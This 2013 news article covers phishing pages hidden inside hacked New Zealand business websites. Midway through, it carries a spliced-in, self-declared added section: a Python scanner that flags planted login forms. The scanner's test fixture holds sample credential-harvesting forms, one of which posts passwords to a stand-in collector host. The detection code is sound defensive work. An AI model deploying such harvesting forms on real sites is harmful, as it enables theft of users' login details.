Genuine websites host net scams

04:54, Oct 30 2013

International cyber-criminals are preying on Kiwi companies, hiding scam pages within their websites to steal unsuspecting victims' personal details.

The sophisticated criminals are burying their "phishing" pages within legitimate websites to "host" their criminal activity, as they seek access to their victims' financial details.

The hacked companies are usually unaware, police say.

The national cyber-crime centre in Wellington has been closing down an average of one scam page every day - usually within an hour of finding it.

"Phishing sites attack businesses and their customers," Detective Clifford Clark said.

"They're after usernames, passwords, and any other information they can gain from you.

"The way they do it, they entice people to go to their sites via spam mail. It's a huge problem because of the impact it has on individuals.

"We've had businesses lose very large sums of money, and individuals as well."

The criminals set up a near-perfect replica of banking or email log-in pages and hide them within the framework of a different, legitimate organisation's website. They then send out a bulk spam email with a link to the bogus page, advising users that they need to log into their bank or email. The profile data is stolen before the users are redirected to the real bank or email site to log in again. The only thing different is the URL at the top of the page; everything else is identical, Dr Clark said.

"When you get to it, it will look [for example] just like your bank one. It will get you to put in your details. It's clever, they've got lots of little tricks."

One Kiwi website was found recently to have five phishing pages hidden within it, attempting to get log-in data from HSBC Bank customers, Yahoo, Maersk shipping clients and a gaming website.

Netsafe cyber-security programme manager Chris Hails said the number of phishing attacks on legitimate Kiwi businesses had risen sharply in the past few months.

The main target was small to medium businesses using cheap and vulnerable software to build their websites, which often left plenty of "back doors" for hackers.

"In the last month we have had more than 100 small businesses affected by this sort of thing," he said. Once the website had been hacked, a fake log-in page could be planted. Mass emails and even fake online job advertisements were then used to lure prospective victims to the page, where their credit card or log-in details were harvested.
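The two passages above describe the same pattern: a credential-harvesting page planted somewhere in a compromised site's file tree, usually posting the captured details to a collector script before redirecting. A site owner or hosting provider can look for that footprint directly. The following is an added example, not code from the article or from any organisation named in it: it walks a webroot, parses every HTML page, and flags credential forms that live outside the paths where the site's own login forms are expected, or that post to a host other than the site's own. The webroot layout, hostname and sample pages it builds are constructed for illustration.

```python
"""Scan a site's webroot for credential-harvesting pages planted in it.

Defensive heuristic for a site owner or hosting provider: find HTML files
that contain a password field outside the paths where the site's own login
forms are expected, and flag any credential form that posts to a host other
than the site's own. Paths, hostnames and sample pages are constructed.
"""
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect every <form> on a page: its action and whether it has a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if attrs.get("type", "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _posts_offsite(action, site_host):
    """True when a form action names a host that is not the site's own."""
    host = urlparse(action).hostname
    return host is not None and host.lower() != site_host.lower()


def scan_webroot(root, site_host, expected_login_paths):
    """Return sorted (relative_path, reason) tuples for suspicious pages under root."""
    expected = {p.strip("/") for p in expected_login_paths}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".html", ".htm", ".php")):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                scanner = _FormScanner()
                scanner.feed(fh.read())
            cred_forms = [f for f in scanner.forms if f["password"]]
            if not cred_forms:
                continue
            # A password form anywhere the site does not normally keep one is
            # the main signal: phishing kits are dropped into images/, css/,
            # cache dirs and similar, not into the site's real login route.
            if rel not in expected:
                findings.append((rel, "credential form outside expected login paths"))
            for form in cred_forms:
                if _posts_offsite(form["action"], site_host):
                    host = urlparse(form["action"]).hostname
                    findings.append((rel, f"credential form posts to external host {host}"))
    return sorted(findings)


# Constructed sample site: one genuine login page, one harmless page, and two
# planted pages of the kind described in the article (hypothetical content).
SAMPLE_PAGES = {
    "login.html": '<form action="/session" method="post">'
                  '<input type="text" name="user"><input type="password" name="pw"></form>',
    "about.html": "<h1>About us</h1>",
    "images/cache/index.html": '<form action="post.php" method="post">'
                               '<input type="password" name="passwd"></form>',
    "css/verify/index.htm": '<form action="http://collector.invalid/submit">'
                            '<input type="password" name="p"></form>',
}


def build_sample_site(root):
    """Write the constructed sample pages under root."""
    for rel, body in SAMPLE_PAGES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the sample site in a temp dir and scan it; site host is hypothetical."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_webroot(root, "www.example.co.nz", ["login.html"])


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

The expected-paths list is the part a real deployment has to get right: it should be generated from the site's own templates or router, not typed by hand, so that a new legitimate form does not drown the alerts in noise. The external-host check is a weaker signal on its own, because many kits post to a PHP script in the same directory and only redirect off-site afterwards, which is why the path check comes first.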

The main perpetrators tended to be Eastern European groups, although Chinese scammers were "up and coming" in the phishing world, Dr Clark said.

"We are talking about organised crime, invariably offshore organised crime. They are professional phishermen."

The four-person cyber-crime team monitors the phishing sites and alerts the hacked companies and domain hosts to get the pages down as soon as possible.

"Every minute it's up there, there's more victims going to go through that page," Dr Clark said.

"We're aiming to get these things down within an hour of being notified, if possible.

"Sometimes they're down within minutes."

Internationally, banks, money transfer and e-commerce sites were the subject of more than three-quarters of the 72,758 unique phishing attacks recorded by the not-for-profit Anti-Phishing Working Group for the first half of this year.

ANZ fraud risk manager Peter Plowman said there had been a rise in the number of phishing scams piggybacking on the websites of legitimate New Zealand businesses. It was common for spam emails to be sent out directing customers to dummy websites pretending to be log-in pages for banks.

"We do get people trying to impersonate our sites," he said.

"There wouldn't be a week that goes by that we don't get a report on that."

The Dominion Post